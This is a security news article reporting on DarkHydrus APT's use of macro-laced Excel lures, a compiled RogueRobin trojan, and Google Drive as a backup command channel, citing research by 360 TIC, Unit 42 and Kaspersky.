New malicious campaigns attributed to DarkHydrus APT group show the adversary’s use of a new variant of the RogueRobin Trojan and of Google Drive as an alternative command and control (C2) communication channel.
The group’s latest activity was observed against targets in the Middle East, luring them with Excel documents laced with malicious VBA code (macro).
For security reasons, macros are disabled by default in the Microsoft Office suite, and they do not run unless the user enables the feature manually.
Recycling its malware
These attacks were first observed by researchers at 360’s Threat Intelligence Center (360 TIC) on January 9, who attributed them to DarkHydrus APT, who Kaspersky Lab tracks as Lazy Meerkat.
The Chinese researchers noticed that the macro in the malicious documents downloaded a .TXT file and then the legitimate ‘regsvr32.exe’ application is used to run it. After several more steps, a backdoor written in C# is dropped on the victim machine.
According to research from Palo Alto Networks’ Unit 42, the text file hides a Windows Script Component (.SCT) file that delivers a version of the RogueRobin trojan. Originally, this custom payload is PowerShell-based, but it looks like the threat actor ported it to a compiled variant.
Using Google Drive to deliver instructions
DarkHydrus compiled RogueRobin with an extra command, that allows it to use Google Drive as a secondary method for sending their instructions.
The command is called ‘x_mode’ and it is disabled by default. However, the adversary can turn it on via DNS tunneling channel, which is the main communication line with the C2 server.
Immediately after activation, the trojan receives a list of settings stored in variables set when sending the ‘x_mode’ command; these values allow it to exchange information through Google Drive: URL for downloading, uploading, updating files, and the authentication details.
The information exchange happens after RogueRobin uploads a file to Google Drive. The document is then monitored for changes. Any modification is considered a command.
DarkHydrus sends regards
Both research teams observed that RogueRobin checks if it is running in a sandbox environment.
In a report this week, Unit 42 writes that “in addition to checks for common analysis tools running on the system. The Trojan also checks to see if a debugger is attached to its processes and will exit if it detects the presence of a debugger.”
In their analysis, the researchers say that RogueRobin uses DNS tunneling to talk to the C2 server and checks for a debugger every time it issues a DNS query.
If a debugger is identified, the query resolves to a hex-coded subdomain (676f6f646c75636b.gogle[.]co) that translates to ‘goodluck.’
“This DNS query likely exists as a note to researchers or possibly as an anti-analysis measure, as it will only trigger if the researcher has already patched the initial debugger check to move onto the C2 function,” speculate the researchers.
DarkHydrus was discovered by Palo Alto Networks’ Unit 42 team last summer in attacks against a government agency in the Middle East.
Costin Raiu, head of the GREAT (Global Research and Analysis Team) at Kaspersky Lab, described the actor as “sneaky” and “creative,” with an interest in the “Middle East, governments and aviation.”
DarkHydrus was also observed hunting for credentials from educational institutions in the same region. Unit 42 noticed such an attack as recently as June 24, 2018.